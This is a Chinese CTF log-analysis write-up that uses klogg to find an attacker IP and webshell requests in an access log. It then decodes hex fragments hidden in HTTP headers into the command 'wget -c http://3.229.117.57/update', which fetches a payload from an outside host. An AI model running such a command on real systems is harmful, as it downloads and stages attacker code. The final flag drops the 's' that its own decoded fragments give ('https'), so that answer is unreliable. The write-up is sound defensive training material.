【CTF-MISC-日志分析】使用klogg分析日志内容
工具
klogg 22.06.0.1289:https://github.com/variar/klogg/releases/tag/v22.06
第一题
题目描述
你是一名安全分析师,公司的Web服务器可能被攻击者植入了后门。
请分析提供的访问日志,找出以下信息:
攻击者使用的恶意IP地址是什么?flag格式:flag{IP地址},例如flag{192.168.10.10}
解析
用klogg打开日志,勾选Enable regular expression logical combining的功能,然后输入命令:
“cmd” or “shell”
搜索到了198.51.100.42这个地址相关的请求shell和cmd明显恶意文件
所以这个IP就是地址
198.51.100.42--[16/Jun/2023:00:16:10+0000]"GET /cmd.php?id=328491&action=update&token=731053 HTTP/1.1"301 1061"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15""X-Custom-Header:733a2f2f332e"198.51.100.42--[16/Jun/2023:00:16:33+0000]"GET /shell.php?id=996606&action=edit&token=650160 HTTP/1.1"304 2471"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36""X-Custom-Header:372e35372f75"198.51.100.42--[16/Jun/2023:00:15:53+0000]"GET /cmd.php?id=689443&action=delete&token=981439 HTTP/1.1"200 7233"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0""X-Forwarded-For:127.0.0.1, 632068747470"198.51.100.42--[16/Jun/2023:00:16:46+0000]"GET /webshell.php?id=465538&action=view&token=504473 HTTP/1.1"302 1755"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36""Authorization:Bearer 7064617465"答案
答案:flag{198.51.100.42}
第二题
题目描述
攻击者执行的完整命令是什么?最终提交flag格式为flag{执行的完整命令},如flag{ls -la /tmp}
解析
由第一题可知,攻击者是在16/Jun/2023:00:15到16/Jun/2023:00:16之间执行的恶意请求,所以我们要查看攻击者在16/Jun/2023:00:10到16/Jun/2023:00:19之间的所有日志信息,输入命令:
“198.51.100.42” and “16/Jun/2023:00:1”
按时间顺序排列:
198.51.100.42--[16/Jun/2023:00:15:35+0000]"GET /system.php?id=897641&action=edit&token=422278 HTTP/1.1"302 9812"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15""Via:1.1 proxy1, 1.1 proxy2, 77676574202d"198.51.100.42--[16/Jun/2023:00:15:53+0000]"GET /cmd.php?id=689443&action=delete&token=981439 HTTP/1.1"200 7233"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0""X-Forwarded-For:127.0.0.1, 632068747470"198.51.100.42--[16/Jun/2023:00:16:10+0000]"GET /cmd.php?id=328491&action=update&token=731053 HTTP/1.1"301 1061"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15""X-Custom-Header:733a2f2f332e"198.51.100.42--[16/Jun/2023:00:16:21+0000]"GET /exec.php?id=713079&action=delete&token=150053 HTTP/1.1"502 5275"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15""Via:1.1 proxy1, 1.1 proxy2, 3232392e3131"198.51.100.42--[16/Jun/2023:00:16:33+0000]"GET /shell.php?id=996606&action=edit&token=650160 HTTP/1.1"304 2471"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36""X-Custom-Header:372e35372f75"198.51.100.42--[16/Jun/2023:00:16:46+0000]"GET /webshell.php?id=465538&action=view&token=504473 HTTP/1.1"302 1755"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36""Authorization:Bearer 7064617465"攻击者将命令拆分成多个部分隐藏在HTTP头中。
让我将这些十六进制编码片段按时间顺序拼接并解码:
解码每个HTTP头中的十六进制数据:
- 00:15:35-
77676574202d→wget - - 00:15:53-
632068747470→c http - 00:16:10-
733a2f2f332e→s://3. - 00:16:21-
3232392e3131→229.11 - 00:16:33-
372e35372f75→7.57/u - 00:16:46-
7064617465→pdate
按时间顺序拼接:
wget - c http s://3. 229.11 7.57/u pdate去掉空格并合理组合:wget -c http://3.229.117.57/update
答案
答案:flag{wget -c http://3.229.117.57/update}
